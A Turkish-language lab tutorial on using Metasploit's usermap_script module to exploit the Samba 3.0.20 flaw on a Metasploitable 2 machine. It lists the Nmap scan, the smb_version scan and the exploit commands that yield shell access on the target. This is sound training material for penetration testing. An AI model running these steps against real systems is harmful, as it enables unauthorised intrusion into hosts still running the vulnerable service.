MSF usermap_script İstismar Modülü ile SAMBA Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki SAMBA servisine ait zafiyet tespit edildikten sonra istismar edilecek ve SAMBA servisini çalıştıran kullanıcı hakları ile komut satırı bağlantısı elde edilecektir.

IP adresi 192.168.5.106 olan Metasploitable 2, Nmap ile taratıldığında TCP 445. portta SAMBA 3.x servisinin hizmet verdiği görülmektedir.

nmap -p445 -sV -n –open 192.168.5.106

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-01

 

SAMBA servisinin sürümünü tespit etmek için MSF smb_version auxiliary modülü kullanılabilir.

search smb_version
use auxiliary/scanner/smb/smb_version
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-02

 

Modül çalıştırılır.

set RHOSTS 192.168.5.106
run

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-03

 

Böylece SAMBA servisinin sürümünün 3.0.20 olduğu görülmektedir. Bu sürümdeki zafiyetlerin istismar modülünü tespit edebilmek Rapid7 İstismar Veritabanı kullanılabilir.

https://www.rapid7.com/db/modules

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-04

 

SAMBA 3.0.20 servisinin MSF usermap_script istismar modülü ile istismar edilebileceği görülmektedir.

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-05

 

Modülün temel seçenekleri incelenir.

use exploit/multi/samba/usermap_script
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-06

 

Hedef IP adresi yazılarak modül başlatılır ve komut satırına erişim sağlanır.

set RHOST 192.168.5.106
run
id
hostname

acquiring-meterpreter-shell-on-linux-by-using-msf-usermap-script-exploit-module-07

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.